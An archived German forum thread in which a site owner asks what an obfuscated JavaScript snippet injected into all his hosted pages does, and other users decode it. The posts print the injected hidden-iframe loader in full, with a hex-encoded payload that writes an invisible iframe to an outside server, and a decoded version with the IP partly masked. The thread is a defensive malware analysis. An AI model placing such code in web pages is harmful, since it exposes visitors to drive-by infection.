PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [HTML/CSS/JS] Was macht dieses Java Script (Virus??)



bulli
10.12.2007, 20:02
Hallo,
auf meinen Seiten bei einem Hoster ist auf allen Dateien, nach ?> vom PHP code, diese Javascript, was macht dieser Code:


<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b())); }function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0; v475caca8c6444<v475caca8c5857.length; v475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304 b(v475caca8c5857.substr(v475caca8c6444, v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D373 66163633138636339207372633D5C27687474703A2F2F37372 E3232312E3133332E3138382F2E69662F676F2E68746D6C3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A313330343234292B2761363764643166306163625C27207 7696474683D343736206865696768743D323734207374796C6 53D5C27646973706C61793A206E6F6E655C273E3C2F6966726 16D653E27293C2F5343524950543E'));</script>


<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v475caca8c304b(v475caca8c3842){ function v475caca8c403b () {var v475caca8c4833=16; return v475caca8c4833;} return(parseInt(v475caca8c3842,v475caca8c403b())); }function v475caca8c5042(v475caca8c5857){ function v475caca8c685a () {return 2;} var v475caca8c6049='';for(v475caca8c6444=0; v475caca8c6444<v475caca8c5857.length; v475caca8c6444+=v475caca8c685a()){ v475caca8c6049+=(String.fromCharCode(v475caca8c304 b(v475caca8c5857.substr(v475caca8c6444, v475caca8c685a()))));}return v475caca8c6049;} document.write(v475caca8c5042('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D373 66163633138636339207372633D5C27687474703A2F2F37372 E3232312E3133332E3138382F2E69662F676F2E68746D6C3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A313330343234292B2761363764643166306163625C27207 7696474683D343736206865696768743D323734207374796C6 53D5C27646973706C61793A206E6F6E655C273E3C2F6966726 16D653E27293C2F5343524950543E'));</script>

Jedesmal, wenn man die Seite betritt, kommt eine Meldung vom Virenprogramm und die Seite läde sehr lange.

Ich wäre sehr dankbar, wenn mir jemand sagt, was dieser Code macht.

Gremlin
10.12.2007, 20:30
Sowas liebe ich xD so richtig verwirrende Funktionen... naja fangen wir mal an das ganze aufzulösen ;)

So hier mal eine Version wo man besseren Durchblick hat, ich hab den Funktionen, Variablen, Parametern mal eindeutige Namen gegeben wodurch man sie schneller wiederfindet ;)




<script>
function funktion1(parameter1){
function funktion2 () {
var variable1=16;
return variable1;
}
return(parseInt(parameter1,funktion2()));
}


function funktion3(parameter2){
function funktion4 () {
return 2;
}
var variable2='';

for(variable3=0; variable3<parameter2.length; variable3+=funktion4()){
variable2+=(String.fromCharCode(v475caca8c304 b(parameter2.substr(variable3, funktion4()))));
}
return variable2;
}

document.write(funktion3('3C5343524950543E776 96E646F772E7374617475733D27446F6E65273B646F63756D6 56E742E777269746528273C696672616D65206E616D653D373 66163633138636339207372633D5C27687474703A2F2F37372 E3232312E3133332E3138382F2E69662F676F2E68746D6C3F2 72B4D6174682E726F756E64284D6174682E72616E646F6D282 92A313330343234292B2761363764643166306163625C27207 7696474683D343736206865696768743D323734207374796C6 53D5C27646973706C61793A206E6F6E655C273E3C2F6966726 16D653E27293C2F5343524950543E'));</script>


Wenn ich viel Lust und Langeweile habe mach ich später mal weiter, aber das hier kann auch schon etwas helfen *gg es macht auf jedenfall nur irgendeine Ausgabe ich vermute noch ein Iframe mit Link zu nem Virus oder so ;)

bulli
10.12.2007, 20:43
Sowas liebe ich xD so richtig verwirrende Funktionen.

Schön, das ich was gefunden habe, was dir Spaß macht^^. Ne, also erst mal danke, weil ich habe keinen Plan von Java Script, aber so wie ich es beurteilen kann, entschlüsselt diese Script, den langen String 43524950543E77[..]43E und gibt diesen aus. und fals wirklich jemanf Lust hat das zu entschlüssel oder auch immer, der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)

Hier nochmal nur den String:

3C5343524950543E77696E646F772E7374617475733D27446F 6E65273B646F63756D656E742E777269746528273C69667261 6D65206E616D653D37366163633138636339207372633D5C27 687474703A2F2F37372E3232312E3133332E3138382F2E6966 2F676F2E68746D6C3F272B4D6174682E726F756E64284D6174 682E72616E646F6D28292A313330343234292B276136376464 3166306163625C272077696474683D34373620686569676874 3D323734207374796C653D5C27646973706C61793A206E6F6E 655C273E3C2F696672616D653E27293C2F5343524950543E

Gremlin
10.12.2007, 20:51
der Sring orginal ist ohne Leerzeichen (nicht so wie ins Gremlins Lösung)
Achsoooo na und ich hab mich schon gewundert... *mal kurz Router abschalt und weiter probier*

Gremlin
10.12.2007, 21:20
Hab den Code geknackt xD war ein HEX String der zu einem normalen ascii Text macht dabei rausgekommen ist folgendes:


<SCRIPT>window.status='Done';document.write('<iframe name=76acc18cc9 src=\'http://77.***.133.188/.if/go.html?'+Math.round(Math.random()*130424)+'a67dd1 f0acb\' width=476 height=274 style=\'display: none\'></iframe>')</SCRIPT>


Die IP die aufgerufen wird gehört zu einem Rechner in Russland ;)
hab 3 Zahlen weggemacht damit es keiner aufruft ^^

bulli
11.12.2007, 15:29
Danke,

und was war auf dem server, irgend ein virus??

Gremlin
11.12.2007, 16:56
Ich habe ihn nicht aufgerufen, zu gefährlich, aber ich gehe davon aus.

Xenon
11.12.2007, 21:57
was mich immer noch wunndert ist woher kommt das in deine datei bwz andere dateien , wenn du es nicht reingemacht hast ??
weil von sowas habe ich 0 PLAN

mfg
adi

bulli
11.12.2007, 22:36
ganz einfach, da hat jemand meine webspace gehackt, und noc hwas , mein passwort war nicht sehr einfach zu erraten, mit sehr vielen sonderzeichen.

Wie man sieht, es kann wirklich jeden treffen.